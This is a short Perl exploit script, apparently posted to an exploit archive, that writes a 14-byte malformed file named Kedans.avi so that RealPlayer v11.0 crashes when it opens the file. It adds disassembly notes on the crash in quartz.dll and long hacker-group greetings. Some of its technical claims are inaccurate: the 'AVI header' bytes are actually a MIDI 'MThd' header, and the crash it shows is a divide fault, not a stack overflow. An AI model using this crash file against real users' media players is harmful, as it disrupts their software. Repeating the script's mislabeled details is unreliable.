#!/usr/bin/perl

###
# Title : RealPlayer v11.0 (.avi) Local Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows 
# Impact : Stack Overflow in 'RealPlayer.exe' Process
# Tested on : Windows XP SP3 Fran�ais 
# Target : RealPlayer v11.0.0.446
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# Usage : 1 - Creat AVI file (14 bytes)
#      =>    2 - Open AVI file With RealPlayer v11.0
#      =>    3 -  OverFlow & Crshed !!!
# ------------
# Homologue Bug in MP_Classic: (http://exploit-db.com/exploits/11535) || By : cr4wl3r 
# ------------
# Assembly Error in [quartz.dll] line: ! 74872224() ! :
# { [div] eax ,ecx ; 0x74872224 "\xf7\xf1" }
# -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
# 0x7487221b || 0x8b 0xd9 || [mov] || ' ebx,ecx ' 
# 0x7487221d || 0xd1 0xeb || [shr] || ' ebx,1 ' 
# 0x7487221f || 0x03 0xc3 || [add] || ' eax,ebx '  ||<<(�)
# 0x74872221 || 0x83 0xd2 0x00 || [adc] || ' edx,0' ||<<(�-NULL)
# 0x74872224 || 0xf7 0xf1 || [div] || ' eax,ecx ' ||<< **(Error Here !!!! * Crash * !!!!)
# Error in Memory "Read" [0x756d6d6f] 
# N0te : This BUG is Succeeding with any MediaPlayers opened the AVI files in [quartz.dll *!74872224()*]
# ------------
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";                  
print "    |============================================|\n";
print "    |= [!] Name : RealPlayer v11.0 AVI File     =|\n";
print "    |= [!] Exploit : Local Buffer Overflow      =|\n";
print "    |= [!] Author : KedAns-Dz                   =|\n";
print "    |= [!] Mail: Ked-h(at)hotmail(dot)com       =|\n";
print "    |============================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"; # AVI Header
open(file , ">", "Kedans.avi"); # Evil File AVI (14 bytes) 4.0 KB
print file $PoC;  
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close(file);  

# Thanks To : ' cr4wl3r ' From Indonesia & All Indonesia MusLim HacKers

#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX 
# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# [ Special Greets to '3em GE Class' & all 3Se Pupils , BACALORIA 2011 Enchallah 
# Messas Secondary School - Ain mlilla - 04300 - Algeria ] ,
# Greets All My Friends (cit� 1850 logts - HassiMessaouD - 30008 -Algeria ) ,
# ThanX : (hotturks.org) TeX * KadaVra ... all Muslimised Turkish Hackers .
# ThanX to : Kelvin.Xgr (kelvinx.net) Vietnamese Hacker .
#===============================================================================